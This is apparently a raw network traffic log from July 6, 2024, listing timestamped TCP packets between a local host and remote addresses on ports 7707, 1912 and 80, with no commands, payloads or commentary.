Jul 6, 2024 13:27:53.091384888 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.091451883 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.091461897 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.091461897 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.091466904 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.091651917 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.091655016 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.091686964 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.091697931 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.091801882 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.091813087 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.091830015 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.091855049 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.091907024 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.092525959 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.092572927 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.092586040 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.092633963 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.092710972 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.092721939 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.092734098 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.092762947 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.092880011 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.093432903 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.093498945 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.093511105 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.093601942 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.093615055 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.093657017 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.093686104 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.094135046 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.094377041 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.094422102 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.094434977 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.094540119 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.094551086 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.094561100 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.094588041 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.094660044 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.095285892 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.095350981 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.095366001 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.095443964 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.095454931 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.095465899 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.095479965 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.095494986 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.095568895 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.096189022 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.168668985 CEST	80	49803	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:53.169325113 CEST	80	49803	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:53.172168970 CEST	49803	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:53.175533056 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175581932 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175592899 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175611973 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.175642967 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175661087 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175663948 CEST	49803	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:53.175668955 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.175734043 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.175740004 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175751925 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175760984 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175820112 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.175945044 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175956011 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175965071 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175976038 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.175987005 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.176008940 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.176008940 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.176048040 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.176551104 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.176590919 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.176601887 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.176886082 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.182980061 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183031082 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183042049 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183058023 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.183083057 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183110952 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.183136940 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183168888 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183181047 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183199883 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.183288097 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.183303118 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183312893 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183324099 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183336020 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183355093 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.183406115 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.183455944 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183469057 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183595896 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.183903933 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183974028 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.183985949 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.184070110 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.184082985 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.184096098 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.184124947 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.184251070 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.184954882 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.184967041 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.184978008 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185017109 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185045004 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.185075998 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.185111046 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185122013 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185133934 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185144901 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185161114 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.185245037 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.185297012 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185312986 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185338020 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185367107 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.185415983 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185430050 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185498953 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.185570002 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185580969 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185592890 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185605049 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185621977 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.185717106 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185729027 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185739994 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.185749054 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.185794115 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.185794115 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.186444044 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.186456919 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.186467886 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.186763048 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.186774015 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.186925888 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.187979937 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.188431978 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.188478947 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.188534021 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.188546896 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.188580036 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.188596964 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.188608885 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.188608885 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.188622952 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.188651085 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.188685894 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.188698053 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.188709021 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.188715935 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.188787937 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.190043926 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.190246105 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.190355062 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.217988014 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.219683886 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.226346016 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267153025 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267174006 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267185926 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267292023 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267313957 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.267337084 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267349005 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267360926 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267366886 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.267385006 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.267488003 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267499924 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267510891 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267523050 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267534971 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267549992 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267554998 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.267579079 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.267579079 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.267821074 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267842054 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267853975 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267954111 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.267956972 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267970085 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267980099 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.267992973 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268011093 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.268073082 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268102884 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.268174887 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268249989 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268261909 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268290043 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.268369913 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268382072 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268395901 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268407106 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.268407106 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268434048 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.268471003 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.268526077 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268537998 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268549919 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268563032 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268589020 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.268657923 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.268871069 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268882990 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268893003 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.268985987 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.275600910 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275680065 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275691986 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275697947 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.275805950 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275824070 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275836945 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275836945 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.275847912 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275861025 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275872946 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275877953 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.275877953 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.275886059 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275954008 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275964022 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275974035 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275985003 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.275985003 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.275998116 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276005983 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276019096 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276026964 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276031971 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276043892 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276046991 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276057005 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276068926 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276091099 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276165009 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276176929 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276186943 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276197910 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276206970 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276211977 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276223898 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276233912 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276241064 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276245117 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276259899 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276273012 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276283979 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276288986 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276297092 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276299000 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276324987 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276418924 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276626110 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276635885 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276648998 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276658058 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.276674986 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.276736975 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.280617952 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.280637026 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.280647993 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.280716896 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.284493923 CEST	49804	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:53.289388895 CEST	80	49804	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:53.289576054 CEST	49804	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:53.289576054 CEST	49804	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:53.294892073 CEST	80	49804	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:53.295018911 CEST	49804	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:53.299765110 CEST	80	49804	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:53.347084045 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347135067 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347146034 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347157001 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.347219944 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347237110 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347249031 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347253084 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.347276926 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.347419977 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347430944 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347441912 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347501993 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.347501993 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.347542048 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347632885 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347644091 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347695112 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347706079 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347716093 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.347727060 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.347740889 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.347768068 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.349548101 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349565983 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349577904 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349589109 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349601984 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349664927 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349668026 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.349678040 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349708080 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349719048 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349756956 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349757910 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.349771023 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349782944 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.349808931 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.349878073 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.349956989 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.350183964 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.350207090 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.350223064 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.350233078 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.350244999 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.350256920 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:53.350272894 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:53.350367069 CEST	49797	7707	192.168.2.4	94.232.249.204
